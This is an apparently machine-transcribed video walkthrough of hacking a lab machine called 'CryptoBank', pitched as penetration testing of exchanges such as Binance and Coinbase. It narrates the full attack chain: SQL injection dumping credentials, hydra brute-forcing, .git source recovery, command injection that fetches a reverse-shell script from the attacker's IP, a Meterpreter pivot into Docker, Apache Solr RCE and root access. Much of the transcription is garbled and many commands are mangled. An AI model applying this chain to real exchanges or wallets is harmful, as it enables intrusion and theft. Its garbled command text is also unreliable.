Hello guys, welcome back to a Pen Testers Club. Today we're going to see how we can do a penetration testing on crypto servers. Basically we would like to look on penetration testing like crypto servers on blockchain, Binance, BSB, Trust Wallet, Coinbase, uh, Ledger Wallet, or choice is your wish. Okay, but I just make a lab for this on my own lab. Like I set up a lab, so I want to use for this as a penetration testing to gain for your knowledge to get it done. How we can do it in depth of penetration testing, but it's very hard level, but we will do that one. Okay, so what are the penetration testing methodologies we require? So first one is like network scanning, enumeration, exploitation, and post exploration and privilege escalation. So we directly go through a scanning like network scanning first. Like when you go for network scanning, you type sudo esu, then type your password. You can type net discover minus I80. So I found the system here. I just like use the 192.168.32. So I just type nmap t4 minus a. So this will displace the what are the running hosts is available over there. So we got it here. 22 is SSH and 80 is the HTTP service running on the virtual machines. Let's take a look on the web page now. So we just come back. We type 192.168.1.32. We just see here we got it a crypto bank. So here we got it a crypto bank. Now you can see here everything information we are getting here. So, but we would like to get the information. First of all, we would like to search with the directory buster. Okay, so before we go with the directory buster, so let it be first we do the directory buster with 192.168.1.32. So this will extract the list of data. Okay, so now come back here. So you just click on about. We never get like crypto news, crypto opticals, crypto news, Coindesk, etc. things. Click on token sale, nothing. Click on roadmap, nothing else. Click on team. In the team, we never get like William D. Daily sale. Click on the email, but we got it a useful information like William.d, but it's not a good information. Then every information you got it. So you just need to note down this all. Then click on Bill White. No have John Doe. No have now. No have. So now what else we do? We just so these are getting the information index.html development. So copy the development, open new tab, paste it. So it's asking user ID and password. So we need to crack this user ID and password. So now come back here. Here we got it like assets. Come back. just want to close this, come back, okay, open the assets. So in the assets we just like get like logo, JS, image, fonts. So these are not a useful information. Then come back. Then we have seen like a trade directory. So that trade directory is like, so we just put a trade. So here we got it a trade. So either we would like to look the SQL injection is vulnerable with this or not. So I just come back here. I just click on secure login. So that also a trade. So close this and I just open new tab, come back, click on settings. So that in the trade I would like to do a SQL injection. So that is vulnerable or not. So I just put manual proxy configuration, then come back here. You just use here like click on proxy, intercept is on, then come back here, use a bar. So username you just type admin, you type password is password. Now just click on login, click on don't save. So now you got it here, something information. So you just right click on this and click on copy a file. You just type request.txt, then click on save. And after that you just close this and you just close the worksuit. Okay, so for faster performance I would like to use this. I just close this also. So now just type exit. So now what you need to do, so you need to do SQL map minus r request.txt minus level equal to 3. You will say yes, yes. So here I got it a parameter user. It's a time-based SQL injection. Oh, this is a directly it's came like this. Sorry. So here we got it parameter injections. Now you can see here. So now we would like to type minus dbs. So we would like to get in the database. Yes, yes. So we got it the database. So once we go to the database, we just type crypto bank minus tables. So we are extracting the tables from the crypto bank. What else is available inside the tables? Yes, yes. So in the tables have accounts, comments and loans. So I would like to go for again tables, columns. Yes, yes. So sorry, I just need to in the table accounts, columns. So okay. So first of all we would like to extract the tables. So once you extracted the tables, from the table accounts and columns, sorry, I just want to use columns. So now it will come. Now let's see. Here we got it in the columns. So now we would like to use in the same thing columns, username, password and dump. So I want to extract the username and password from here. So it was done. So you just need to copy these usernames and password. Otherwise if you want to test anything, so you just copy this one, come back to here, close this, come back, uh, so you just paste the username and come back, copy, paste the password. paste it. So we have successfully logged in. We have dumped entire of the database and their user ID and passwords of the crypto one of the hosting servers. So we just get it like this only, like some users profiles. Okay, but we want to get more than that. Okay, so you can see here 87,549. These are public assets, but we want to get the private assets also. Okay, so we just close this one and we just click on logout. Okay, now this is no information. So now come back here, development. So you just I just want to do now directory buster. I just want to do here development. So in the development, nothing else, we got it here. Now I just need to copy all those things in the one file, one folder. So that's I show you type list. So I already copied this separate, like usernames is separate and passwords is separate. So I just made everything separate. So I just type hydra minus l users in this users format, passwords in password list. I just made it here, and I just want to give 192.168.1.32, and I want to get HTTP target and the development. So let's see, I got the development here. So I just type clear and I just give here. So here I got the everything. So these are the SSH credentials, also this one. So now I already cracked those things. Okay, copy. So come back, paste it. So these are the public assets. I don't want to care about the public assets, so I just keep it away. Close this. So now we just copy, then paste it, then click on send. So I just type cryptobank.local development. So I want to try, this is the password. Okay, come back, paste it in password, and open this the user ID. Come back and paste it. So but we never get it only for development. Okay, that's not a matter for us. Okay, but we want to get extract more inside of this database. So I just, again, I would like to open a new tab. So this password need to use further, so I just keep it like that. So I just use directory buster on http cryptohost dot local, sorry, cryptobank.local forward slash development minus user is Zulis and password is this one. So inside of the database I would like to get the information. So in the development I got it. Now backups. So come back here, I type uh, backups. In the backups list have like a parent directory and home directory. So you just click on home directory. So we are come back to again to the beginning state. He just make it like a very like Chris jock, Chris jockey, like a cross jockey things. So how we need to get it done now? So for this we need to get very clear. Okay, so he's confusing inside the website for the hackers or penetration testers. So how you can get the access this one? So uh, again, let it be. If this is done, okay, uh, let's come back. So file, open new tab. So I would like to type directory buster and crypto bank dot local development backups and home. So from here I just type enter. So now let's see what is the generating word list. So here we got a scanning URLs, but I got a scanning URLs with a .git. Okay, so .git is an information where you get information. We find like a hidden directories inside the backup home dot directory. We got like a git.git. This means that development was supported by using a multiple branches as an GitHub. So he was stored everything inside of the GitHub where he was stored. Okay, so to move around, to look closer look, let's to move these things. So first of all, we just see this one, this is over. So this is git, right? So you just leave it this one, then open a new tab here in the Firefox. You just type git hack GitHub. Okay, so let's see. So some type of crypto holders or crypto server hosting peoples, so they just hold all those things inside the GitHub, otherwise some other places they just use a Linode or etc things. So I just want to copy this one, copy, open a tab, terminal. So before that will come, and we can see here it removed the resources codes from the .git folder while keep the directory structures is unchanged. So without changing that one, they can extract the hidden data. Okay, so you have successfully reached to the top level. Okay, if you fall down from there, you need to come from beginning. Okay, so that's why. So it's showing type list. So clear. So you can type git clone and paste the repository, git hack. So now you can type cd git hack. Now type list. You can type chmod and give me the permission like git hack. So you can type python git hack and paste the repository of home /git. So what else you get the previous in the there. So that is the .git. Okay, so if you want to go with the directory buster, this is the first URL which I was get. So that's I'm getting. So now it's extracting all hidden information. Okay, so it was extracted. So now I can type list cd. You just type cryptobank.local, then type list. Then you need to go development. So because first our tool is development, then type list, and we are get it on that those things like tools in the directory. So list, you can go to a command execution. So you need to get the command execution. Type list, paste. So you need to type cat command execution.php. So once you have observed here, okay, once you have observed here, like HTML tag etc things, div folder, home button etc things, align button, label. So if list here etc things, okay, so the execution of the password, okay, we got it here password. This is the password. This is the same password which we have also got it, WJWM. So this is the same password which we have here also. So we got the password. So now what we need to do? So open the Firefox, then close this, and this also. Just close this, come back. You just need to come from development. You need to go /tools /homepage.html. So we come to a homepage.html. So here we would like to get a three options, like we would like to choose a first execute a command and run a system command. So in the system command, so what we would like to run? So you just type username in the ID. A password is what else? The password is this is the password. So you need to use this one for uh, for execution here. So password. Come back here. We just executed, but you got user ID www.cryptobank.com. So we have cryptobank dot cryptobank. Okay, so now what we would like to get it from this cryptobank. So you just type list, nothing, then you just type password, uh, yes, then you just submit command execution.php, command execution.html, rs.sh. So no worries. Now come back here, uh, open new tab, msf console, msf venum minus p, cmd a unix, and I would like to get first my IP address. I config my IP address is 33 and L port is 999. So I just keep it at 999 as a constant, it does not matter. So I just execute this one. So we got it the CMD Unix shell. So you just need to type echo echo. So you need to copy from here. Okay, so some people's they are made mistakes and cannot be executed in the server. So you need to copy only the bash minus c. If you copy with the bash minus c, you cannot able to execute. So you need to copy only the bash minus c. Copy and paste it. Then you just type okay r shell dot sh. So reverse shells dot sh. You can type list. I got it r shell dot sh here. So now what else we need to do? So I just type python minus m http server. So it was running. So now I would like to upload this http server into the my this mm, crypto bank. Okay, so I'm uploading the virus file like execution file to connect each other. So I just type wget and I would like to type http 192.168.1.33 a000 /r shell.sh. Then come back here in this thing. So you just copy the password, come back here and paste it, then click on submit. So we have successfully submitted. Now you just type list and paste the password. Once you paste the password, so you have got it reverse shell.sh. So file is available, successfully available now. So now what you need to do? So now you need to do the one thing. Okay, so now you come to a command prompt. So I just quit this one. Now I don't want netcat minus lvp listening. So now I just come back here. I just type bash r shell.sh, then come back here, this folder. I just copy this one, open Firefox and paste it. Then I just click on submit. Come down, save. Once come back, netcat. So it was connected. You just type ID. So we got the ID. So you type, you just type here which Python you not get. You type again which Python 3, but we not get anything. Sorry, I just typed a mistake. Which Python 3. So here we got it. So you just type here uh, Python 3 minus C, import pty dot sp span, just type bin bash, then use semicolon. So we got it here. We just come to cd home directory. We can type list sudo minus here. No, we can type list minus lha. No, we never get anything else, and we just no. So you come back here. So you just type ifconfig. So here we have Docker on the machine, on the local machine, and this is a hosting something one. Okay, so we need to find this one. ss minus tunlp. So we found here something useful information. Okay, so that is like 172.17.0.18983. So for this we just come back here, open new tab. So now we just type here msf renum minus linux. So I would like to use the port is 33 and elf and escalate.elf. So I'm getting the linux privilege escalations. So I just go to come here, cd temp folder, I type list. We never get in the list anything. So you just type python minus yum http server. So that's running. http server 80. It's okay. So now you just type to get here wc get http 192.168.1.33. So I would like to look carefully. ifconfig. Yes, it's 33. So we have done successfully the payload. So just close this, come back here, 33 80. So come back here, escalate elf, copy this one, come back here and paste it. So we got it, the escalate plf. So that's we got it here. So once we got it, the escalate plf, So you just type quit this one, you just type MSF console. Once you come to MSF console, and you just give a permission chmod plus x. So for this you just need to give a permission escalate.elf. So once you given a permission, so let's wait for MSF console. And before that you just need to copy this one Linux. Okay, copy this one Linux x64 reverse.tcp. Okay, copy this. So you can type use exploit multi-handler, and you just need to type set a payload and paste it whatever else you have done. Okay, Linux x64 metapeta reverse shell.exe. So you can type show options. So in the show options you just need to type set lhost equal to 192.168.1.33, and you need to type set lport is 1111, and you just type run. Once you click on run, so the reverse TCP handler is running. So now you just type dot and colon, sorry, escalate.elf. So we are running in the escalate.elf. So we got it a reversion meter. So I just type run auto root minus yes 172.117.0.0 by 24. So this was, I want to exploit this one in the where they was running on the Docker. Okay, so I just take this, that was done. So after done that one, so I want to do port forward add minus list 8983, and I just want to use the same port 8983 minus reverse 172.17.0.1. So port forwarding is done already. So now let's take a service that are running in the Docker instance. We browse that instance in the browser using the following associated web. So come back here, open new tab, you just type 127.0.0.1/8983. So now whatever's inside they are running in the crypto bank server. So we got it, that servers what they are running here. So that's Solar. So it is an Apache Solar. It is an open source enterprise search platform. From the initial observation, it was clear that was interface is old. This means that was version is installed on the virtual machine might be vulnerable. The machine was running the version of 8.1.1. It is visible from the previous image. We search a Solar on such exploit for any direct exploit. For this version, we were lucky. We have the remote code execution exploit. We download and exploit from the such exploit or some other things, otherwise directly through a metasploit. Okay, so now what we do here. So now we just come back here, we just type background. Yeah, we come to a background, so we just type search SOLR, solar. So we got it here, solar, Apache solar remote code execution via velocity template. So this is what we require. We are looking use 0, yes. So we just type show options. We are getting a show options, so we just need to type set lhost 192.168.1.33 and type set srv host. We just use same thing 192.168.1.33. So set el port 388. So and you just type set our hostess localhost. So that is your local host now, and you just type run. So the sessions was created. So now what we need to type? So you just type sessions minus l list. You just type sessions minus I2, and we just need to type, we got it a meter shell, we just type a shell, we just type created a shell, we just type id. So we just type which python. So this is a normal python, so you just type python minus m, you just type import and pty dot swan, then you just type bin bash. That's it. So I just given a wrong way, so python minus c, I just given minus m there, so import pty span bin bash. So we got it directly into the solar. So now we are in the server, we just type sudo minus l, we get like all passwords, no passwords for all. Then what we need to type after this? So you just type sudo bin bash. So solar is a default password for this solar. So we are directly came cd root, we are directly in the root, type list cat flag.txt. So good job, we got it here, good job. here our secure cold wallet. So this is the cold wallet which they can store millions of bitcoins in the cold wallet. So that's it, guys. This is how you can do a penetration testing on crypto servers. So try it your own, guys. Thank you guys for watching. So before we are leaving, so I would like to explain some other things here. Okay, so what else we did here? So number one, we would like to look here. For doing a penetration testing for crypto servers, so we just look in the penetration methodology. First, we look the network scanning, network discover, and map. In the enumeration, we browse the HTTP server and generate a user dictionary. And we go for exploitation. In the exploitation, we use time-based SQL injections and enumeration of various credentials and directory brute forcing using directory buster and Hydra. Again, you use a directory buster enumerating with git hack, like inside of hidden directory files where they store like either like Linode or etc server or private server and everything. And we also use crafting reverse bash payload also and exploitation on command injections also. So also we would like to know post exploration. In the post exploitation, we perform enumeration of service connections using a net stack also, and port forward using a port forwarding through whatever they're running in their server. We build with the Solar and we gain the access of that Solar also. And the privilege escalation, we exploit the Solar remote code execution vulnerability and escalate the privilege. So we gain the access of the cold wallet. That's it. We got that things. So you try it your own, guys. Thank you guys for watching. Have a great day.